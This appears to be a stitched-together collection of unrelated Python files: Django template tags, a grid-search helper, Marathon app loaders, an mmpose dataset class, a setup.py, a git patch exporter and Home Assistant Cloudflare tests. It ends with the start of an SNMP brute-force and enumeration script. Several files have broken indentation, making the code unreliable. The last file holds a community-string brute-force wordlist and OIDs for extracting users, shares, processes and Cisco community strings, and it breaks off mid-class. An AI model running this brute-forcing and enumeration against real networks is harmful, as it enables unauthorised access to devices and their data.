from __future__ import unicode_literals
import logging
from inspect import ismethod
from django.core.urlresolvers import (reverse, resolve, NoReverseMatch,
Resolver404)
from django.utils.html import escape
from django.utils.safestring import mark_safe
from django.utils.encoding import smart_text
from django.utils.translation import ugettext as _
from django.db.models import Model
from django import template
from django.core.urlresolvers import reverse_lazy
from content.models import Language, Category
# Get instance of logger
logger = logging.getLogger('project_logger')
register = template.Library()
@register.simple_tag(takes_context=True)
def show_menu(context):
categories = [cat.slug for cat in Category.objects.all()]
    path = context['request'].path
    return {'categories': categories, 'path': path}
@register.inclusion_tag('navbar.html', takes_context=True)
def show_categories(context):
categories = [cat for cat in Category.objects.all()]
    path = context['request'].path
    logger.debug('show_categories path: %s', path)
    return {'categories': categories, 'path': path}
@register.inclusion_tag('navbar.html', takes_context=True)
def show_navbar(context):
languages = [lang for lang in Language.objects.all()]
categories = [cat for cat in Category.objects.all()]
subcategories = []# [subcat for subcat in SubCategory.objects.all()]
path = context['request'].path
    return {
        'languages': languages,
        'categories': categories,
        'subcategories': subcategories,
        'path': path,
        'path_lang': context['path_language'],
        'path_cat': context['path_category'],
        'path_subcat': context['path_subcategory'],
    }
@register.simple_tag(takes_context=True)
def active_page(context, req):
request = context['request']
#print "path", request
#if not request:
# logger.error('Cant find request - needed for active page css')
    logger.debug('active_page called for path: %s', request.path)
return "active"
#try:
# return "active"
#return "active" if resolve(request.path_info).url_name == view_name else ""
#except Resolver404:
# return ""
@register.filter(name='is_empty')
def is_empty(value):
""" Checks whether value is empty. Should be string. """
logger.info('is_empty value:%s' % value )
if not value.strip(' '):
return True
else:
return False
CONTEXT_KEY = 'DJANGO_BREADCRUMB_LINKS'
MAX_WIDTH_BREADCRUMBS=1200
MAX_WIDTH_BREADCRUMB=200
@register.simple_tag(takes_context=True)
def render_breadcrumbs(context, *args):
"""
Render breadcrumbs html using twitter bootstrap css classes.
NOTE: Breadcrumb MUST end with a '/'
"""
    if 'request' not in context:
logger.error("request object not found in context! Check if "
"'django.core.context_processors.request' is in "
"TEMPLATE_CONTEXT_PROCESSORS")
return ''
    logger.info('Rendering breadcrumbs for path: %s', context['request'].path)
    current_app = context['request'].resolver_match.namespace
    logger.debug('current_app: %s', current_app)
#url = reverse(viewname="content:python", current_app=current_app)
#print url
    # Build (href, label) pairs from the path components, ignoring leading/trailing '/'
    links = []
    href = ""
    for url in context['request'].path.lstrip('/').rstrip('/').split('/'):
        href += url + '/'
        links.append((href, _(smart_text(url)) if url else url))
    orig_links = list(links)  # keep a copy; links may be truncated below
    logger.debug('breadcrumb links: %s', links)
    # HACK: cap the number of breadcrumbs to what fits the rendered width.
    # If there are too many, collapse the leading ones into a single "..." entry.
    max_links = MAX_WIDTH_BREADCRUMBS // MAX_WIDTH_BREADCRUMB
    if len(links) > max_links:
        no_to_remove = len(links) - max_links
        href = links[no_to_remove - 1][0]
        del links[0:no_to_remove]
        links.insert(0, (href, "..."))
if not links: return ''
return mark_safe(template.loader.render_to_string(
'navbar.html', {'breadcrumbs': links,
'breadcrumbs_total': len(orig_links)}))
# if args:
# template_path = args[0]
# else:
# template_path = 'django_bootstrap_breadcrumbs/bootstrap2.html'
# print "befor elubjkks [p"
# links = []
# for (label, viewname, view_args) in context['request'].META.get(CONTEXT_KEY, []):
# if isinstance(viewname, Model) and hasattr(
# viewname, 'get_absolute_url') and ismethod(
# viewname.get_absolute_url):
# url = viewname.get_absolute_url()
# print "fndsnflksnkfnsdjdjdjjdpopopopop"
# else:
# try:
# try:
# # 'resolver_match' introduced in Django 1.5
# current_app = context['request'].resolver_match.namespace
# logger.info('%s' % current_app)
# except AttributeError:
# try:
# resolver_match = resolve(context['request'].path)
# print resolver_match, "jkjdlsfjjlsdkjlfkjlskjfljsdljfldjslkjfkldsj"
# current_app = resolver_match.namespace
# logger.info('%s' % current_app)
# except Resolver404:
# print '404'
# current_app = None
# url = reverse(viewname=viewname, args=view_args,
# current_app=current_app)
# except NoReverseMatch:
# url = viewname
# links.append((url, _(smart_text(label)) if label else label))
# logger.warning('fdskljfldsjlkfjdkls %s' % links )
# if not links:
# return ''
# return mark_safe(template.loader.render_to_string(
# template_path, {'breadcrumbs': links,
# 'breadcrumbs_total': len(links)}))
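# Illustrative sketch (not part of the original module): how the truncation in
# render_breadcrumbs behaves. With MAX_WIDTH_BREADCRUMBS=1200 and
# MAX_WIDTH_BREADCRUMB=200, only the last 6 crumbs of an 8-segment path are
# kept; the removed leading crumbs become a single "..." entry that links to
# the last removed segment's href.
def _breadcrumb_truncation_demo():
    links = [('a/', 'a'), ('a/b/', 'b'), ('a/b/c/', 'c'), ('a/b/c/d/', 'd'),
             ('a/b/c/d/e/', 'e'), ('a/b/c/d/e/f/', 'f'),
             ('a/b/c/d/e/f/g/', 'g'), ('a/b/c/d/e/f/g/h/', 'h')]
    max_links = MAX_WIDTH_BREADCRUMBS // MAX_WIDTH_BREADCRUMB
    if len(links) > max_links:
        no_to_remove = len(links) - max_links
        href = links[no_to_remove - 1][0]
        del links[0:no_to_remove]
        links.insert(0, (href, "..."))
    return links  # starts with ('a/b/', '...') followed by the last six crumbs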
|
python
|
from sklearn.model_selection import GridSearchCV
from luciferml.supervised import classification as cls
def hyperTune(classifier, parameters, X_train, y_train, cv_folds, tune_mode, isReg):
"""
    Takes a classifier, a parameter grid, training data and the number of folds, and performs grid-search cross-validation.
"""
try:
scoring = 'accuracy'
if isReg:
scoring = 'r2'
print(
'Applying Grid Search Cross validation on Mode {} [*]'.format(tune_mode))
grid_search = GridSearchCV(
estimator=classifier,
param_grid=parameters,
scoring=scoring,
cv=cv_folds,
n_jobs=-1,
verbose=4,
)
grid_search.fit(X_train, y_train)
best_accuracy = grid_search.best_score_
best_parameters = grid_search.best_params_
print("Best Accuracy: {:.2f} %".format(best_accuracy*100))
print("Best Parameters:", best_parameters)
print('Applying Grid Search Cross validation [', u'\u2713', ']\n')
# if tune_mode == 3:
# print('############################################### \n')
# print('Re-running classifier with these params\n')
return best_parameters
except Exception as error:
print('HyperParam Tuning Failed with Error: ', error,'\n')
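if __name__ == '__main__':
    # Minimal usage sketch (illustrative): tune a LogisticRegression on synthetic
    # data. The estimator and parameter grid below are assumptions, not part of
    # the original module; any scikit-learn estimator and grid would work.
    from sklearn.datasets import make_classification
    from sklearn.linear_model import LogisticRegression

    X, y = make_classification(n_samples=200, n_features=10, random_state=0)
    params = {'C': [0.1, 1.0, 10.0]}
    best = hyperTune(LogisticRegression(max_iter=200), params, X, y,
                     cv_folds=3, tune_mode=1, isReg=False)
    print('Returned parameters:', best)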
|
python
|
import os.path
import logging
from utils import make_id, get_resource
from os.path import join
logger = logging.getLogger(__name__)
def apps_dir():
return os.path.dirname(os.path.abspath(__file__))
def load_app(app_def_file, app_id=None, parent_group="/"):
"""Loads an app definition from a json file and sets the app id."""
app_path = os.path.join(apps_dir(), "{}.json".format(app_def_file))
app = get_resource(app_path)
if app_id is None:
app['id'] = make_id(app_def_file, parent_group)
else:
app['id'] = join(parent_group, app_id)
logger.info('Loaded an app definition with id={}'.format(app['id']))
return app
def mesos_app(app_id=None, parent_group="/"):
return load_app('mesos-app', app_id, parent_group)
def http_server(app_id=None, parent_group="/"):
return load_app('http-server', app_id, parent_group)
def docker_http_server(app_id=None, parent_group="/"):
return load_app('docker-http-server', app_id, parent_group)
def healthcheck_and_volume(app_id=None, parent_group="/"):
return load_app('healthcheck-and-volume', app_id, parent_group)
def ucr_docker_http_server(app_id=None, parent_group="/"):
    return load_app('ucr-docker-http-server', app_id, parent_group)
def sleep_app(app_id=None, parent_group="/"):
return load_app('sleep-app', app_id, parent_group)
def docker_nginx_ssl(app_id=None, parent_group="/"):
return load_app('docker-nginx-ssl', app_id, parent_group)
def resident_docker_app(app_id=None, parent_group="/"):
return load_app('resident-docker-app', app_id, parent_group)
def persistent_volume_app(app_id=None, parent_group="/"):
return load_app('persistent-volume-app', app_id, parent_group)
def readiness_and_health_app(app_id=None, parent_group="/"):
return load_app('readiness-and-health-app', app_id, parent_group)
def private_docker_app(app_id=None, parent_group="/"):
return load_app('private-docker-app', app_id, parent_group)
def private_ucr_docker_app(app_id=None, parent_group="/"):
return load_app('private-ucr-docker-app', app_id, parent_group)
def pinger_localhost_app(app_id=None, parent_group="/"):
return load_app('pinger-localhost-app', app_id, parent_group)
def pinger_bridge_app(app_id=None, parent_group="/"):
return load_app('pinger-bridge-app', app_id, parent_group)
def pinger_container_app(app_id=None, parent_group="/"):
return load_app('pinger-container-app', app_id, parent_group)
def fake_framework(app_id=None, parent_group="/"):
return load_app('fake-framework', app_id, parent_group)
def external_volume_mesos_app(app_id=None, parent_group="/"):
return load_app('external-volume-mesos-app', app_id, parent_group)
def ipv6_healthcheck(app_id=None, parent_group="/"):
""" The app uses netcat to listen on port. It uses alpine image which has netcat with ipv6 support by default.
It uses command nc (shortcut for netcat) that runs for every new connection an echo command in shell.
For more information about the nc options just run `docker run alpine nc --help`
"""
return load_app('ipv6-healthcheck', app_id, parent_group)
def app_with_https_readiness_checks(app_id=None, parent_group="/"):
return load_app('app-with-https-readiness-checks', app_id, parent_group)
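# Usage sketch (illustrative, not executed on import): load_app reads
# "<name>.json" next to this module, so the call below assumes mesos-app.json
# exists alongside this file and that utils.make_id/get_resource are importable.
def _load_app_demo():
    app = mesos_app(app_id="my-app", parent_group="/dev")
    return app['id']  # -> "/dev/my-app"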
|
python
|
from abc import ABCMeta
import numpy as np
from torch.utils.data import ConcatDataset, Dataset, WeightedRandomSampler
from mmpose.datasets.builder import DATASETS
from .mesh_base_dataset import MeshBaseDataset
@DATASETS.register_module()
class MeshMixDataset(Dataset, metaclass=ABCMeta):
"""Mix Dataset for 3D human mesh estimation.
    The dataset combines data from multiple datasets (MeshBaseDataset) and
    samples the data from the different datasets with the provided proportions.
    The dataset loads raw features and applies the specified transforms
    to return a dict containing the image tensors and other information.

    Args:
        configs (list): List of configs for multiple datasets.
        partition (list): Sample proportions of the multiple datasets. Its
            length should match that of configs. The elements should be
            non-negative and need not sum to one.
Example:
>>> from mmpose.datasets import MeshMixDataset
>>> data_cfg = dict(
>>> image_size=[256, 256],
>>> iuv_size=[64, 64],
>>> num_joints=24,
>>> use_IUV=True,
>>> uv_type='BF')
>>>
>>> mix_dataset = MeshMixDataset(
>>> configs=[
>>> dict(
>>> ann_file='tests/data/h36m/test_h36m.npz',
>>> img_prefix='tests/data/h36m',
>>> data_cfg=data_cfg,
>>> pipeline=[]),
>>> dict(
>>> ann_file='tests/data/h36m/test_h36m.npz',
>>> img_prefix='tests/data/h36m',
>>> data_cfg=data_cfg,
>>> pipeline=[]),
>>> ],
>>> partition=[0.6, 0.4])
"""
def __init__(self, configs, partition):
"""Load data from multiple datasets."""
assert min(partition) >= 0
datasets = [MeshBaseDataset(**cfg) for cfg in configs]
self.dataset = ConcatDataset(datasets)
self.length = max(len(ds) for ds in datasets)
weights = [
np.ones(len(ds)) * p / len(ds)
for (p, ds) in zip(partition, datasets)
]
weights = np.concatenate(weights, axis=0)
self.sampler = WeightedRandomSampler(weights, 1)
def __len__(self):
"""Get the size of the dataset."""
return self.length
def __getitem__(self, idx):
"""Given index, sample the data from multiple datasets with the given
proportion."""
idx_new = list(self.sampler)[0]
return self.dataset[idx_new]
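# Worked example (illustrative) of the sampling weights computed in __init__:
# two datasets of length 4 and 2 with partition [0.6, 0.4] get per-sample
# weights 0.6/4 = 0.15 and 0.4/2 = 0.2, so each dataset is drawn roughly in
# proportion to its partition entry regardless of its size.
def _partition_weights_demo():
    lengths, partition = [4, 2], [0.6, 0.4]
    weights = np.concatenate(
        [np.ones(n) * p / n for p, n in zip(partition, lengths)])
    return weights  # array([0.15, 0.15, 0.15, 0.15, 0.2, 0.2])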
|
python
|
# coding: utf-8
# pylint: disable=missing-docstring
# pylint: disable=invalid-name
import os
import glob
import subprocess
from setuptools import setup, find_packages
about = {}
HERE = os.path.abspath(os.path.dirname(__file__))
with open(file=os.path.join(HERE, 'src','dima', '__version__.py'), mode='r', encoding='utf-8') as f:
exec(f.read(), about) # pylint: disable=exec-used
with open(file='README.md', mode='r', encoding='utf-8') as f:
readme = f.read()
requires = []
def _verify_platform():
    cmd = ['uname', '-m']
    output = subprocess.check_output(cmd).decode("utf-8").strip()
    if output == 'x86_64':
        requires.append('PyQt5 == 5.15.2')
    elif output == 'armv7l':  # raspbian buster
        pass
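def _verify_platform_stdlib():
    # Alternative sketch (not part of the original script): platform.machine()
    # returns the same architecture string as `uname -m`, without a subprocess.
    import platform
    if platform.machine() == 'x86_64':
        requires.append('PyQt5 == 5.15.2')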
def main():
_verify_platform()
setup(
name=about['__title__'],
version=about['__version__'],
description=about['__description__'],
long_description=readme,
long_description_content_type='text/markdown',
author=about['__author__'],
author_email=about['__author_email__'],
python_requires=">=3.6",
license=about['__license__'],
zip_safe=False,
classifiers=[
'Development Status :: 3 - Alpha',
'Natural Language :: English',
'License :: OSI Approved :: MIT License',
'Operating System :: POSIX :: Linux',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
],
packages=find_packages(where='src'),
package_dir={'': 'src'},
data_files=[
('dima/dima_frontend/ui/', list(glob.glob('src/dima/dima_frontend/ui/*'))),
('dima/', list(glob.glob('src/dima/dima.conf'))),
],
include_package_data=True,
scripts=[
'bin/dima',
],
install_requires=requires,
)
if __name__ == '__main__':
main()
|
python
|
import logging
from os.path import expanduser
from git import InvalidGitRepositoryError
from pythoncommons.file_utils import FileUtils
from pythoncommons.git_wrapper import GitWrapper
LOG = logging.getLogger(__name__)
class FormatPatchSaver:
"""
A class used to export git-format-patch files from a git repository to a specified target directory.
Attributes
----------
base_refspec : str
The refspec to use as the base git reference for format-patch comparison.
Specified with args.
other_refspec : str
The refspec to use as the ending git reference for format-patch comparison.
Specified with args.
dest_basedir : str
Base directory of the format-patch result files.
Specified with args.
dest_dir_prefix : str
Jira ID of the upstream jira to backport.
Specified with args.
working_dir : str
Path to the git repository.
dir_suffix : str
The final directory to put the results into.
repo : GitWrapper
A GitWrapper object, representing the repository.
patch_file_dest_dir : str
A path, pointing to the final directory where the format-patch results will be placed.
Methods
-------
run()
Executes this command.
        The steps are roughly:
1. Ensure that the provided working directory is a directory that contains a git repository.
2. Validate refspecs, ensuring that the two refspecs are different and pointing to a valid commit or branch.
3. Ensure that the destination directory is created.
4. Execute git format-patch and save the result files to the target directory.
"""
def __init__(self, args, working_dir, dir_suffix):
# Coming from args
self.base_refspec = args.base_refspec
self.other_refspec = args.other_refspec
self.dest_basedir = args.dest_basedir
self.dest_dir_prefix = args.dest_dir_prefix
self.working_dir = working_dir
self.dir_suffix = dir_suffix
# Dynamic attributes
self.repo = None
self.patch_file_dest_dir = None
def run(self):
# TODO check if git is clean (no modified, unstaged files, etc)
self.ensure_git_repository()
self.validate_refspecs()
self.ensure_dest_dir_is_created()
self.run_format_patch()
def ensure_git_repository(self):
try:
repo = GitWrapper(self.working_dir)
self.repo = repo
except InvalidGitRepositoryError:
raise ValueError(f"Current working directory is not a git repo: {self.working_dir}")
def validate_refspecs(self):
if self.base_refspec == self.other_refspec:
raise ValueError(
f"Specified base refspec '{self.base_refspec}' is the same as other refspec '{self.other_refspec}'"
)
exists = self.repo.is_branch_exist(self.base_refspec)
if not exists:
raise ValueError(f"Specified base refspec is not valid: {self.base_refspec}")
exists = self.repo.is_branch_exist(self.other_refspec)
if not exists:
raise ValueError(f"Specified other refspec is not valid: {self.base_refspec}")
def ensure_dest_dir_is_created(self):
dest_basedir = expanduser(self.dest_basedir)
self.patch_file_dest_dir = FileUtils.join_path(dest_basedir, self.dest_dir_prefix, self.dir_suffix)
FileUtils.ensure_dir_created(self.patch_file_dest_dir)
def run_format_patch(self):
refspec = f"{self.base_refspec}..{self.other_refspec}"
LOG.info("Saving git patches based on refspec '%s', to directory: %s", refspec, self.patch_file_dest_dir)
self.repo.format_patch(refspec, output_dir=self.patch_file_dest_dir, full_index=True)
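# Usage sketch (illustrative, not part of the original module): the args object
# only needs the four attributes read in __init__; this assumes the
# pythoncommons package is installed and that working_dir points at a git repo.
if __name__ == "__main__":
    from argparse import Namespace

    args = Namespace(
        base_refspec="master",
        other_refspec="feature-branch",
        dest_basedir="~/patches",
        dest_dir_prefix="YARN-1234",  # hypothetical Jira ID
    )
    FormatPatchSaver(args, working_dir=".", dir_suffix="run1").run()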
|
python
|
"""Test the Cloudflare config flow."""
from pycfdns.exceptions import (
CloudflareAuthenticationException,
CloudflareConnectionException,
CloudflareZoneException,
)
from homeassistant.components.cloudflare.const import CONF_RECORDS, DOMAIN
from homeassistant.config_entries import SOURCE_REAUTH, SOURCE_USER
from homeassistant.const import CONF_API_TOKEN, CONF_SOURCE, CONF_ZONE
from homeassistant.data_entry_flow import (
RESULT_TYPE_ABORT,
RESULT_TYPE_CREATE_ENTRY,
RESULT_TYPE_FORM,
)
from homeassistant.setup import async_setup_component
from . import (
ENTRY_CONFIG,
USER_INPUT,
USER_INPUT_RECORDS,
USER_INPUT_ZONE,
_patch_async_setup_entry,
)
from tests.common import MockConfigEntry
async def test_user_form(hass, cfupdate_flow):
"""Test we get the user initiated form."""
await async_setup_component(hass, "persistent_notification", {})
result = await hass.config_entries.flow.async_init(
DOMAIN, context={CONF_SOURCE: SOURCE_USER}
)
assert result["type"] == RESULT_TYPE_FORM
assert result["step_id"] == "user"
assert result["errors"] == {}
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
USER_INPUT,
)
await hass.async_block_till_done()
assert result["type"] == RESULT_TYPE_FORM
assert result["step_id"] == "zone"
assert result["errors"] == {}
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
USER_INPUT_ZONE,
)
await hass.async_block_till_done()
assert result["type"] == RESULT_TYPE_FORM
assert result["step_id"] == "records"
assert result["errors"] is None
with _patch_async_setup_entry() as mock_setup_entry:
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
USER_INPUT_RECORDS,
)
await hass.async_block_till_done()
assert result["type"] == RESULT_TYPE_CREATE_ENTRY
assert result["title"] == USER_INPUT_ZONE[CONF_ZONE]
assert result["data"]
assert result["data"][CONF_API_TOKEN] == USER_INPUT[CONF_API_TOKEN]
assert result["data"][CONF_ZONE] == USER_INPUT_ZONE[CONF_ZONE]
assert result["data"][CONF_RECORDS] == USER_INPUT_RECORDS[CONF_RECORDS]
assert result["result"]
assert result["result"].unique_id == USER_INPUT_ZONE[CONF_ZONE]
assert len(mock_setup_entry.mock_calls) == 1
async def test_user_form_cannot_connect(hass, cfupdate_flow):
"""Test we handle cannot connect error."""
instance = cfupdate_flow.return_value
result = await hass.config_entries.flow.async_init(
DOMAIN, context={CONF_SOURCE: SOURCE_USER}
)
instance.get_zones.side_effect = CloudflareConnectionException()
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
USER_INPUT,
)
assert result["type"] == RESULT_TYPE_FORM
assert result["errors"] == {"base": "cannot_connect"}
async def test_user_form_invalid_auth(hass, cfupdate_flow):
"""Test we handle invalid auth error."""
instance = cfupdate_flow.return_value
result = await hass.config_entries.flow.async_init(
DOMAIN, context={CONF_SOURCE: SOURCE_USER}
)
instance.get_zones.side_effect = CloudflareAuthenticationException()
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
USER_INPUT,
)
assert result["type"] == RESULT_TYPE_FORM
assert result["errors"] == {"base": "invalid_auth"}
async def test_user_form_invalid_zone(hass, cfupdate_flow):
"""Test we handle invalid zone error."""
instance = cfupdate_flow.return_value
result = await hass.config_entries.flow.async_init(
DOMAIN, context={CONF_SOURCE: SOURCE_USER}
)
instance.get_zones.side_effect = CloudflareZoneException()
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
USER_INPUT,
)
assert result["type"] == RESULT_TYPE_FORM
assert result["errors"] == {"base": "invalid_zone"}
async def test_user_form_unexpected_exception(hass, cfupdate_flow):
"""Test we handle unexpected exception."""
instance = cfupdate_flow.return_value
result = await hass.config_entries.flow.async_init(
DOMAIN, context={CONF_SOURCE: SOURCE_USER}
)
instance.get_zones.side_effect = Exception()
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
USER_INPUT,
)
assert result["type"] == RESULT_TYPE_FORM
assert result["errors"] == {"base": "unknown"}
async def test_user_form_single_instance_allowed(hass):
"""Test that configuring more than one instance is rejected."""
entry = MockConfigEntry(domain=DOMAIN, data=ENTRY_CONFIG)
entry.add_to_hass(hass)
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={CONF_SOURCE: SOURCE_USER},
data=USER_INPUT,
)
assert result["type"] == RESULT_TYPE_ABORT
assert result["reason"] == "single_instance_allowed"
async def test_reauth_flow(hass, cfupdate_flow):
"""Test the reauthentication configuration flow."""
entry = MockConfigEntry(domain=DOMAIN, data=ENTRY_CONFIG)
entry.add_to_hass(hass)
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={
"source": SOURCE_REAUTH,
"unique_id": entry.unique_id,
"entry_id": entry.entry_id,
},
data=entry.data,
)
assert result["type"] == RESULT_TYPE_FORM
assert result["step_id"] == "reauth_confirm"
with _patch_async_setup_entry() as mock_setup_entry:
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{CONF_API_TOKEN: "other_token"},
)
await hass.async_block_till_done()
assert result["type"] == RESULT_TYPE_ABORT
assert result["reason"] == "reauth_successful"
assert entry.data[CONF_API_TOKEN] == "other_token"
assert entry.data[CONF_ZONE] == ENTRY_CONFIG[CONF_ZONE]
assert entry.data[CONF_RECORDS] == ENTRY_CONFIG[CONF_RECORDS]
assert len(mock_setup_entry.mock_calls) == 1
|
python
|
#!/usr/bin/env python
# Requires metasploit, snmpwalk, snmpstat and John the Ripper
# _____ _ ____ _______ ____ __
# / ___// | / / |/ / __ \ / __ )_______ __/ /____
# \__ \/ |/ / /|_/ / /_/ / / __ / ___/ / / / __/ _ \
# ___/ / /| / / / / ____/ / /_/ / / / /_/ / /_/ __/
#/____/_/ |_/_/ /_/_/ /_____/_/ \__,_/\__/\___/
#
# SNMP Bruteforce & Enumeration Script
# http://www.secforce.com / nikos.vassakis <at> secforce.com
# ##########################################################
__version__ = 'v1.0b'
from socket import socket, SOCK_DGRAM, AF_INET, timeout
from random import randint
from time import sleep
import optparse, sys, os
from subprocess import Popen, PIPE
import struct
import threading, thread
import tempfile
from scapy.all import (SNMP, SNMPnext, SNMPvarbind, ASN1_OID, SNMPget, ASN1_DECODING_ERROR, ASN1_NULL, ASN1_IPADDRESS,
SNMPset, SNMPbulk, IP)
##########################################################################################################
# Defaults
##########################################################################################################
class defaults:
rate=250.0
timeOut=1.0
port=161
delay=2
interactive=True
verbose=False
getcisco=True
colour=True
default_communities=['','0','0392a0','1234','2read','3com','3Com','3COM','4changes','access','adm','admin','Admin','administrator','agent','agent_steal','all','all private','all public','anycom','ANYCOM','apc','bintec','blue','boss','c','C0de','cable-d','cable_docsispublic@es0','cacti','canon_admin','cascade','cc','changeme','cisco','CISCO','cmaker','comcomcom','community','core','CR52401','crest','debug','default','demo','dilbert','enable','entry','field','field-service','freekevin','friend','fubar','guest','hello','hideit','host','hp_admin','ibm','IBM','ilmi','ILMI','intel','Intel','intermec','Intermec','internal','internet','ios','isdn','l2','l3','lan','liteon','login','logon','lucenttech','lucenttech1','lucenttech2','manager','master','microsoft','mngr','mngt','monitor','mrtg','nagios','net','netman','network','nobody','NoGaH$@!','none','notsopublic','nt','ntopia','openview','operator','OrigEquipMfr','ourCommStr','pass','passcode','password','PASSWORD','pr1v4t3','pr1vat3','private',' private','private ','Private','PRIVATE','private@es0','Private@es0','private@es1','Private@es1','proxy','publ1c','public',' public','public ','Public','PUBLIC','public@es0','public@es1','public/RO','read','read-only','readwrite','read-write','red','regional','<removed>','rmon','rmon_admin','ro','root','router','rw','rwa','sanfran','san-fran','scotty','secret','Secret','SECRET','Secret C0de','security','Security','SECURITY','seri','server','snmp','SNMP','snmpd','snmptrap','snmp-Trap','SNMP_trap','SNMPv1/v2c','SNMPv2c','solaris','solarwinds','sun','SUN','superuser','supervisor','support','switch','Switch','SWITCH','sysadm','sysop','Sysop','system','System','SYSTEM','tech','telnet','TENmanUFactOryPOWER','test','TEST','test2','tiv0li','tivoli','topsecret','traffic','trap','user','vterm1','watch','watchit','windows','windowsnt','workstation','world','write','writeit','xyzzy','yellow','ILMI']
##########################################################################################################
# OID's
##########################################################################################################
''' Credits
Some OIDs borrowed from the Cisc0wn script
# Cisc0wn - The Cisco SNMP 0wner.
# Daniel Compton
# www.commonexploits.com
# [email protected]
'''
RouteOIDS={
'ROUTDESTOID': [".1.3.6.1.2.1.4.21.1.1", "Destination"],
'ROUTHOPOID': [".1.3.6.1.2.1.4.21.1.7", "Next Hop"],
'ROUTMASKOID': [".1.3.6.1.2.1.4.21.1.11", "Mask"],
'ROUTMETOID': [".1.3.6.1.2.1.4.21.1.3", "Metric"],
'ROUTINTOID': [".1.3.6.1.2.1.4.21.1.2", "Interface"],
'ROUTTYPOID': [".1.3.6.1.2.1.4.21.1.8", "Route type"],
'ROUTPROTOID': [".1.3.6.1.2.1.4.21.1.9", "Route protocol"],
'ROUTAGEOID': [".1.3.6.1.2.1.4.21.1.10", "Route age"]
}
InterfaceOIDS={
#Interface Info
'INTLISTOID': [".1.3.6.1.2.1.2.2.1.2", "Interfaces"],
'INTIPLISTOID': [".1.3.6.1.2.1.4.20.1.1", "IP address"],
'INTIPMASKOID': [".1.3.6.1.2.1.4.20.1.3", "Subnet mask"],
'INTSTATUSLISTOID':[".1.3.6.1.2.1.2.2.1.8", "Status"]
}
ARPOIDS={
# Arp table
'ARPADDR': [".1.3.6.1.2.1.3.1 ","ARP address method A"],
'ARPADDR2': [".1.3.6.1.2.1.3.1 ","ARP address method B"]
}
OIDS={
'SYSTEM':["iso.3.6.1.2.1.1 ","SYSTEM Info"]
}
snmpstat_args={
'Interfaces':["-Ci","Interface Info"],
'Routing':["-Cr","Route Info"],
'Netstat':["","Netstat"],
#'Statistics':["-Cs","Stats"]
}
'''Credits
The following OID's are borrowed from snmpenum.pl script
# ----by filip waeytens 2003----
# ---- DA SCANIT CREW www.scanit.be ----
# [email protected]
'''
WINDOWS_OIDS={
'RUNNING PROCESSES': ["1.3.6.1.2.1.25.4.2.1.2","Running Processes"],
'INSTALLED SOFTWARE': ["1.3.6.1.2.1.25.6.3.1.2","Installed Software"],
'SYSTEM INFO': ["1.3.6.1.2.1.1","System Info"],
'HOSTNAME': ["1.3.6.1.2.1.1.5","Hostname"],
'DOMAIN': ["1.3.6.1.4.1.77.1.4.1","Domain"],
'USERS': ["1.3.6.1.4.1.77.1.2.25","Users"],
'UPTIME': ["1.3.6.1.2.1.1.3","UpTime"],
'SHARES': ["1.3.6.1.4.1.77.1.2.27","Shares"],
'DISKS': ["1.3.6.1.2.1.25.2.3.1.3","Disks"],
'SERVICES': ["1.3.6.1.4.1.77.1.2.3.1.1","Services"],
'LISTENING TCP PORTS': ["1.3.6.1.2.1.6.13.1.3.0.0.0.0","Listening TCP Ports"],
'LISTENING UDP PORTS': ["1.3.6.1.2.1.7.5.1.2.0.0.0.0","Listening UDP Ports"]
}
LINUX_OIDS={
'RUNNING PROCESSES': ["1.3.6.1.2.1.25.4.2.1.2","Running Processes"],
'SYSTEM INFO': ["1.3.6.1.2.1.1","System Info"],
'HOSTNAME': ["1.3.6.1.2.1.1.5","Hostname"],
'UPTIME': ["1.3.6.1.2.1.1.3","UpTime"],
'MOUNTPOINTS': ["1.3.6.1.2.1.25.2.3.1.3","MountPoints"],
'RUNNING SOFTWARE PATHS': ["1.3.6.1.2.1.25.4.2.1.4","Running Software Paths"],
'LISTENING UDP PORTS': ["1.3.6.1.2.1.7.5.1.2.0.0.0.0","Listening UDP Ports"],
'LISTENING TCP PORTS': ["1.3.6.1.2.1.6.13.1.3.0.0.0.0","Listening TCP Ports"]
}
CISCO_OIDS={
'LAST TERMINAL USERS': ["1.3.6.1.4.1.9.9.43.1.1.6.1.8","Last Terminal User"],
'INTERFACES': ["1.3.6.1.2.1.2.2.1.2","Interfaces"],
'SYSTEM INFO': ["1.3.6.1.2.1.1.1","System Info"],
'HOSTNAME': ["1.3.6.1.2.1.1.5","Hostname"],
'SNMP Communities': ["1.3.6.1.6.3.12.1.3.1.4","Communities"],
'UPTIME': ["1.3.6.1.2.1.1.3","UpTime"],
'IP ADDRESSES': ["1.3.6.1.2.1.4.20.1.1","IP Addresses"],
'INTERFACE DESCRIPTIONS': ["1.3.6.1.2.1.31.1.1.1.18","Interface Descriptions"],
'HARDWARE': ["1.3.6.1.2.1.47.1.1.1.1.2","Hardware"],
'TACACS SERVER': ["1.3.6.1.4.1.9.2.1.5","TACACS Server"],
'LOG MESSAGES': ["1.3.6.1.4.1.9.9.41.1.2.3.1.5","Log Messages"],
'PROCESSES': ["1.3.6.1.4.1.9.9.109.1.2.1.1.2","Processes"],
'SNMP TRAP SERVER': ["1.3.6.1.6.3.12.1.2.1.7","SNMP Trap Server"]
}
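# Illustrative helper (not used by the script): the shell command shape that
# generic_snmpwalk()/enumerateSNMPWalk() below assemble from these OID tables.
def _example_snmpwalk_command(community='public', version='v2c',
                              ip='192.168.1.1', port=161,
                              oid='1.3.6.1.2.1.1.5'):
    args = ' -c "' + community + '" -' + version + ' ' + str(ip) + ':' + str(port)
    return 'snmpwalk' + args + ' ' + oid  # e.g. snmpwalk -c "public" -v2c 192.168.1.1:161 1.3.6.1.2.1.1.5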
##########################################################################################################
# Classes
##########################################################################################################
class SNMPError(Exception):
'''Credits
Class copied from sploitego project
__original_author__ = 'Nadeem Douba'
https://github.com/allfro/sploitego/blob/master/src/sploitego/scapytools/snmp.py
'''
pass
class SNMPVersion:
'''Credits
Class copied from sploitego project
__original_author__ = 'Nadeem Douba'
